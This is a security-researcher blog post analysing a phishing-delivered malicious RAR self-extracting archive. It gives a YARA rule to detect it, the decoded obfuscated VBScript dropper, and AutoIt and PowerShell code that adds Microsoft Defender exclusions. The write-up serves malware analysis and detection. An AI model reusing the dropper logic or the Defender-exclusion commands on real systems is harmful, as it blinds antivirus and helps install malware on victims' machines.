My next class:
Reverse-Engineering Malware: Advanced Code AnalysisOnline | Greenwich Mean TimeOct 28th - Nov 1st 2024

Increase in Malicious RAR SFX files

Published: 2023-05-17. Last Updated: 2023-05-17 04:19:08 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

This isn't a new attack vector, but I’ve found many malicious RAR SFX files in the wild for a few weeks. An “SFX” file is a self-extracting archive that contains compressed files and is wrapped up with some executable code to decompress them on the fly. The final user receives an executable file (PE file) that can be launched with the need to install a specific tool to decompress the content.  This technique has been used for a while by attackers, and even more interesting, the self-decompression routine can launch any executable (another executable, a script, …)[1]

Most of the time, these files aren’t detected as a known threat because payloads (the files) are compressed (sometimes encrypted too - if a password is used). But they are generally detected as “suspicious”. I wrote a simple YARA rule to detect such files:

rule SelfExtractingRAR
{
    meta:
        description = "Detects an SFX archive with automatic script execution”
        author = “Xavier “Mertens <xmertens@isc.sans.edu>”
    
    strings:
        $exeHeader = "MZ"
        $rarHeader = "Rar!" wide ascii
        $sfxSignature = "SFX" wide ascii
        $sfxSetup = "Setup=" wide ascii

    condition:
       $exeHeader at 0 and $rarHeader and $sfxSignature and $sfxSetup
}

Here is an example of such SFX file that I spotted yesterday. The file was delivered through a phishing campaign and was called "USD 1,810,500.exe” with the following SHA256: e08a8ff9fadce5026127708c57b363bd0b2217a0a96d9ba4e7994601ad1a8963[2]. A good point with such files is that you don’t need to execute them to extract the content. A classic rar command will do the job:

remnux@remnux:/MalwareZoo/20230516$ rar t "USD 1,810,500.exe"

RAR 5.50   Copyright (c) 1993-2017 Alexander Roshal   11 Aug 2017
Trial version             Type 'rar -?' for help

Testing archive USD 1,810,500.exe

1ktZ3RF93vZq427h3lvsYTk434w53G56ek6xCJ
SILENT= 144k80p185MQ7FN1
sF7Yy34s49U9R76Rku09Q0L19P
Setup=wscript Update-sk.s.vbe
q2X4nb8h8ay8003mjTM3W41S2Q77ssEIDH7zXpA
Path=%homedrive%\pxbc
TDaTWZ41l2f4d80XMx97NB5C298bdY
Update=U 06646163K1p2p66F
67562az6K38H90tYJgQTx963kZWMg

Testing     vicmmge.buj                                               OK 
Testing     uhupfsx.xml                                               OK 
Testing     kmpxxcxmlq.docx                                           OK 
Testing     Update-sk.s.vbe                                           OK 
Testing     pxqic.pif                                                 OK 
Testing     fpss.msc                                                  OK 
Testing     epmtilluig.xml                                            OK 
Testing     psxgfd.icm                                                OK 
Testing     pprwvki.ppt                                               OK 
Testing     qcrk.xls                                                  OK 
Testing     ppldgtbkm.xml                                             OK 
Testing     loffd.mp3                                                 OK 
Testing     wfsdrusej.icm                                             OK 
Testing     utmkbkhe.jpg                                              OK 
Testing     lhuhm.docx                                                OK 
Testing     jcftejksj.xls                                             OK 
Testing     nkeej.xl                                                  OK 
Testing     wtnjesas.pdf                                              OK 
Testing     riaam.txt                                                 OK 
Testing     clff.pdf                                                  OK 
Testing     rnovsgsm.txt                                              OK 
Testing     gcprhnl.xls                                               OK 
Testing     lhulocrs.xls                                              OK 
Testing     bxmrh.msc                                                 OK 
Testing     xsdmudolb.xml                                             OK 
Testing     xppwqdiutn.jpg                                            OK 
Testing     eleuutbq.ppt                                              OK 
Testing     cttrdjfv.xml                                              OK 
Testing     ccgjrkh.ini                                               OK 
Testing     lpuukd.icm                                                OK 
Testing     eetv.exe                                                  OK 
Testing     sqtu.docx                                                 OK 
Testing     uvkmtkcrvq.icm                                            OK 
Testing     efitdtqci.bmp                                             OK 
Testing     ruvjtenq.mp3                                              OK 
Testing     wucrjivio.pdf                                             OK 
Testing     bhbeq.icm                                                 OK 
Testing     waemwttb.pdf                                              OK 
Testing     wfhesiw.xml                                               OK 
Testing     sxvkks.xls                                                OK 
Testing     negbxaqdr.msc                                             OK 
Testing     wmlpuwiwdd.ini                                            OK 
Testing     vged.msc                                                  OK 
Testing     pmevdiqiww.ppt                                            OK 
Testing     gwrtofbgi.mp3                                             OK 
Testing     kejrxfveni.jpg                                            OK 
Testing     bnubxgq.pdf                                               OK 
Testing     bdldxj.msc                                                OK 
Testing     hnbfjb.icm                                                OK 
Testing     tpshh.xml                                                 OK 
Testing     exdsgg.icm                                                OK 
Testing     jmwnkkmc.icm                                              OK 
Testing     bkmlgvggjq.xml                                            OK 
Testing     mqen.bin                                                  OK 
Testing     inxwfoap.dll                                              OK 
Testing     qxskgk.ppt                                                OK 
Testing     etiwhseh.txt                                              OK 
Testing     gvgbbm.mp3                                                OK 
Testing     duacabnhh.txt                                             OK 
Testing     blcvjevx.msc                                              OK 
Testing     xjwwawkp.msc                                              OK 
Testing     jfbbaim.dat                                               OK 
Testing     xksrkjuj.exe                                              OK 
Testing     dndafdxcs.docx                                            OK 
Testing     cauhoxnn.bmp                                              OK 
Testing     adtp.icm                                                  OK 
Testing     miwvkhxw.xml                                              OK 
Testing     dtmisespef.pdf                                            OK 
Testing     dntdl.xls                                                 OK 
Testing     pmibtqovo.bin                                             OK 
Testing     jjbilmi.xls                                               OK 
Testing     hspofc.xml                                                OK 
Testing     wniu.ppt                                                  OK 
Testing     ugrjeq.xls                                                OK 
Testing     trgwpgvg.msc                                              OK 
Testing     meul.exe                                                  OK 
Testing     ejlmpu.dll                                                OK 
Testing     jnjvc.xml                                                 OK 
Testing     okmsufva.ppt                                              OK 
Testing     urgqtjbjdv.xml                                            OK 
Testing     mbojgfvxl.ini                                             OK 
All OK

The purpose of the files was to create some trust in the archive. But most of the files contain garbage data. Here are the only interesting ones:

remnux@remnux:/MalwareZoo/20230516/out$ file * | grep -v "UTF-8"
kmpxxcxmlq.docx: Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
pxqic.pif:       PE32 executable (GUI) Intel 80386, for MS Windows
uhupfsx.xml:     ASCII text, with CRLF line terminators
Update-sk.s.vbe: Little-endian UTF-16 Unicode text, with CRLF line terminators
vicmmge.buj:     ASCII text, with very long lines, with no line terminators

The interesting information is returned when you test the archive (see above):

Setup=wscript Update-sk.s.vbe
Path=%homedrive%\pxbc

Files will be extracted in the 'C:\pxbc' (if the victim has rights to do it) and the script ‘Update-sk.s.vbe’ will be executed.

The script is nicely obfuscated. It’s encoded In UTL-16 LE, and the code is polluted with many comments with a lot of Chinese characters. Here is a decoded version:

remnux@remnux://MalwareZoo/20230516/out$ iconv -c -f UTF-16LE -t ASCII Update-sk.s.vbe | grep -v "^'"
on error resume next
o_j_no
fvxnvbahlwqjenu = "kmpxxcxmlq.docx"
wckwqfuoxpx = StrReverse("fip.ciqxp")
hknghkuuktxdvfx = hotbnrfdsuedk("llehS.tpircSW") 
Set obxigdixuharkko = WScript.CreateObject(hknghkuuktxdvfx )
xwduhpaha = wckwqfuoxpx + " " + fvxnvbahlwqjenu
obxigdixuharkko.Run xwduhpaha
function hotbnrfdsuedk(senlukbqxmcs)
hotbnrfdsuedk = StrReverse(senlukbqxmcs)
End function
Sub o_j_no
o_j_no = execute (StrReverse(peelS.tpircSW) + "4000")
End Sub
Sub twvrtegjxowwq(VAR)
twvrtegjxowwq = StrReverse(VAR)
End Sub

This VBS script is easy to understand. It will:

1. Wait for 4 seconds
2. Create a WScript.Shell object
3. Run the command “pxqic.pif kmpxxcxmlq.docx”

The .pif file is an AutoIT-compiled script that will execute the file's content passed as an argument. The file is also encoded and obfuscated. It contains a malicious PowerShell script. Here is how to extract it easily:

remnux@remnux:/MalwareZoo/20230516/out$ cat kmpxxcxmlq.docx | \
iconv -f UTF-16LE -t ASCII -c | \
sed -n '/\#ce/,/\#cs/p' kmpxxcxmlq.docx.out | \
grep -v '^[#|;]'

I did not publish the decode PowerShell script here because it's too big. The script is used as an anti-VM and anti-debugging script. It prevents Microsoft Defender from scanning some files and directories:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionProcess 'RegSvcs.exe'
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess RegSvcs.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\pxbc
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '.vbs'
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '.vbe'
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionExtension .vbe

Here is the code responsible for this:

Func AntiVirus()
    $owmi = ObjGet("winmgmts:\\localhost\root\SecurityCenter2")
    $colitems = $owmi.execquery("Select * from AntiVirusProduct")
    For $objantivirusproduct In $colitems
        $usb = $objantivirusproduct.displayname
    Next
    Return $usb
EndFunc

Func Disabler()
    if AntiVirus() = "Windows Defender" Then
        ;#RequireAdmin
        ShellExecute("powershell"," -Command Add-MpPreference -ExclusionPath " & @ScriptDir,"","",@SW_HIDE)
        ShellExecute("powershell"," powershell -Command Add-MpPreference -ExclusionProcess 'RegSvcs.exe'","","",@SW_HIDE)
        ShellExecute("powershell"," powershell -Command Add-MpPreference -ExclusionExtension '.vbs'","","",@SW_HIDE)
        ShellExecute("powershell"," powershell -Command Add-MpPreference -ExclusionExtension '.vbe'","","",@SW_HIDE)
        ShellExecute("powershell"," powershell -Command Add-MpPreference -ExclusionExtension '*.vbs'","","",@SW_HIDE)
        ShellExecute("powershell"," powershell -Command Add-MpPreference -ExclusionExtension '*.vbe'","","",@SW_HIDE)
    ;EndIf
endFunc

The PowerShell also has a shellcode; it reads data from another obfuscated file. I still need more time to go deeper...

Finally, the .pif executable launches a 'RegSvcs.exe' and performs more code injection on it:

[1] https://www.rarlab.com/vuln_sfx_html.htm
[2] https://bazaar.abuse.ch/sample/e08a8ff9fadce5026127708c57b363bd0b2217a0a96d9ba4e7994601ad1a8963/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 comment(s)
My next class:
Reverse-Engineering Malware: Advanced Code AnalysisOnline | Greenwich Mean TimeOct 28th - Nov 1st 2024

Comments


Diary Archives